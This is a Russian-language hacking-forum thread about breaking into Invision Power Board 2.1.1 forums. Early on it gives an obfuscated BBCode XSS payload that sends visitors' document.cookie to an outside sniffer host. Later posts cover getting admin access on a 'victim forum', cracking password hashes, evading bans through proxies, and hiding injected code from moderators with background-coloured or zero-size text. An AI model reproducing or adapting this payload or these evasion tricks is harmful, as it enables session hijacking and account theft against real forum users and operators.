Вопрос по эксплойту для Ipb 2.1.1.

Привет! Нужен эксплойт для Ipb 2.1.1. Кто нить может помочь?

 

HTML:

[post=1000[topic=target style=background&*#58;url(javascript*:document.image*s&#9*1;&#*49;].*src=*"*&#104*;&#11*6;&#1*16;&*#112*;&#5*8;&#*47;&#*47;&#*97;&#*110;*&#116*;&#1*05;&#*99;&*#104;*a*&#11*6;&#*46;&#*114;&*#117*;&#4*7;&#9*9;&#1*03;&*#105;*&#45*;&#98*;&#10*5;&#1*10;&*#47;s.j&*#112;g?"+document.cookie); ]       [/topic]]


[/post]

Поудаляй все звёздочки из спец. символов. И про репу не забываем ;-)

 

Седня вошел на форум-жертву тока хеш расшифровывать както в лом (по моему долгое это занятие). Естественно чтоб попасть в админку требует пароль юзера. Подскажите пожалуйста, есть какие нить реальные проги по раскодированию хэшей и может быть есть способ по другому попасть в админку.
ПС: FQziT за код спасибо - как проверю, если сработает + к репе с меня

 

IPB 2.x ты хэш не расшифруешь
почему? - юзай поиск...

 

вот хэщ - 52371906352bc10de868a5b733134888 - его возможно расшифровать?

 

Zheca
Нет. И пользуйся поиском по форуму. Об этом уже говорили.

 

Ок! Все понял - кончаю тупить

 

Ввел код в сообщение - ниче не вышло - наверное я гдето лишнюю звездочку убрал

 

это уже где-то публиковали, так что надеюсь никто не против
http://kobeluga.narod.ru/codes.txt

 

Там короче соль. Соль - это шифруется шифрованный пароль. Вот так.
Качай видео по взлому :
http://video.antichat.net/archive/coyl/ipb2.rar
http://video.antichat.net/archive/MicRo/ipb.rar
http://video.antichat.net/archive/LittleLamer/ipb20x.rar
Всё.

 

+ к репе FQziT

 

Смотря под чего блокали ? если по айпи то некак (только прокси),под ник если просто зареги новый и удали куки и файлы.

 

А если хост отрезали - то я понимаю тока прокси остается?

 

Отсканил сервак и получил " возможно, выполнить произвольный код на уязвимость системе". Есть эксплойт. Кто нить может ссылочку дать ссылочку?

 

Zheca Ты читать вообще умеешь?! Причём тут DDos атака и форумы IPB 2.1.1??? И вобще Античат против ДДоса.

 

Спасиб конечно за -1 ( Я знаю что Античат против ДДос. Может я непонятно выразился - но я не собираюсь ддосить - меня интересует сторочка о выполнении произвольного кода. А сканил я сервак с установленным на нем ипб 2.1.1

И еще вопрос: а возможно всатвление кода не в пост а в название темы при ее создании?

 

На воруме который я ломаю админ - гад уж больно прбитый и глазастый. Сходу вычисляет ссылочку на снифер - удаляет пост и юзера. Может быть стоит какая нить защита, которая активируется как тока я выкладываю ссылку на снифер?

 

Глазастый админ это прикольно=)
А серьёзно. Какой нибудь способ автоматом ловить внедрённый сниффер есть?

 

Вопросик появился: После внедрения этого зловредного кода остается что-то вроде [topic/]]. Можно ли этого избежать?

 

Если что-то остается, то можно замаскировать под цвет фона хы-хы...
но хз... у мя ничего не оставалось никогда...

по поводу глазастых админов...
не все XSS работают в Опере... опера не так воспринимает ` как IE ... короч маскируйте посты цветом....

оффтоп... а некоторые форумы типа ЭксББ не проверяют размер шрифта.... можно SIZE=0 поставить и вообще никто не разглядит чего там написано.